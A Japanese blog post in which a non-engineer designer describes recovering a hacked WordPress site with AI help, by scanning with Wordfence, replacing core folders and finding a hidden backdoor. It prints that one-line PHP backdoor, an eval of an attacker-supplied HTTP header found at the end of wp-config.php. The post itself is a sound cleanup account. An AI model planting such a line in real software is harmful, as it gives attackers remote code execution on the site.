デザイナーです。エンジニアではないです。コードはほぼ読めない。そんな自分が、Google AI Studioに聞きまくりながらなんとかウイルス駆除できたので記録しておきます。
同じ状況の人の参考になれば。
どんな状態だったか
Googleサーチコンソールを開いたら、自分が書いた覚えのない英語記事が大量にインデックスされてた。カジノとかNBAベッティングとかそういうやつ。
「???」ってなって管理画面のユーザー一覧を見たら、見たことないアカウントがあった形跡もあって。
これ、完全にハッキングされてるじゃん、と。しかも現在進行形で。
まずWordfenceをいれてスキャン
Wordfence Securityというプラグインが無料で使えて、スキャンするとマルウェアを検出してくれる。入れてスキャンしたら、警告が数百件出た。
wp-adminとwp-includesというフォルダを中心に、いろんなファイルが汚染されてる感じ。Wordfenceの「削除」ボタンを押しても「No such file or directory」みたいなエラーが出たりして、全然消えない。
ここで「なんで消えないの?」ってGoogle AI Studioに聞いた。
「バックドアというものが仕掛けられている可能性が高く、ファイルを個別に削除するより、コアファイルごと新品に入れ替える方が確実です」みたいな返答がきて、なるほどそういう作戦があるのかと。
コアファイルを丸ごと新品に交換する
ここが一番の山場。でもやることはわりとシンプルだった。
WordPressのファイル構成はざっくりこう:
wp-admin/→ 管理画面まわりwp-includes/→ WordPressの中核wp-content/→ テーマ・画像・プラグイン。ここは触らないwp-config.php→ データベース接続情報。これも触らない
汚染されてるwp-adminとwp-includesを、公式サイトからダウンロードした新品のWordPressのものと丸ごと入れ替える。感染ファイルを探すより、エリアごと交換する方が確実、という発想。
FTPでやろうとしてたんだけどAI Studioに「エックスサーバーならファイルマネージャーのZIPアップロードの方が速いですよ」と言われて、そっちでやったら確かに楽だった。
フォルダが二重になって一時的に死んだ
ZIPを展開したとき、wp-admin/wp-admin/みたいに二重になってしまって、サイトが真っ白のFatal errorになった。
焦ってAI Studioに状況を貼り付けたら「フォルダの階層がずれています。中のwp-adminをひとつ上に移動してください」と言われて、修正したら復活した。あのとき一人だったら詰んでたと思う。
wp-config.phpを最後に目視チェックする
コアファイルを入れ替えてWordfenceの警告もかなり減ったけど、AI Studioに「他に確認すべき場所は?」と聞いたら「wp-config.phpを直接開いて末尾を確認してください」と言われた。
ファイルマネージャーで開いて、一番下までスクロールしたら、あった。
@eval($_SERVER['HTTP_8CD0A0B']);
1行だけ、ひっそりと。
「これ何?」ってAI Studioに聞いたら、「外部から任意のプログラムを実行できるバックドアです。これが残っている限りいつでも再侵入されます。この1行を削除してください」と。
削除した。
これがバックドアの正体だったのか、と思ったら、ちょっと興奮した。コードとかほぼわからない自分が、AIと一緒にとはいえ、犯人の仕掛けた罠をピンポイントで見つけて消せたわけで。
Wordfenceで再スキャン→警告ゼロ
wp-config.phpを保存してスキャンしたら、警告ゼロになった。
管理画面もフロントページも正常に動いてた。終わった。
やって気づいたこと
パスワード変更はバックドアを消してから
バックドアが残ってる状態でパスワードを変えても、ハッカーはそれを盗める状態にあるので意味がない。除菌が終わった後に変えること。
wp-contentは触らない
画像とかテーマとか全部ここにある。ここだけは一切削除しないこと。
AIに状況をそのまま貼り付けると助かる
エラーメッセージとかスクリーンショットの内容をそのままAI Studioに投げると、次に何をすればいいか教えてくれる。専門知識がなくても、状況を正確に伝えれば動ける。
まとめ
非エンジニアでも、AI Studioと一緒なら対処できた。一人でやってたら途中で絶対詰んでたと思うけど。
同じ状況の人、あきらめなくて大丈夫です。やってみてください。
わからないことあればコメントに書いてもらえれば、わかる範囲で答えます。
コメント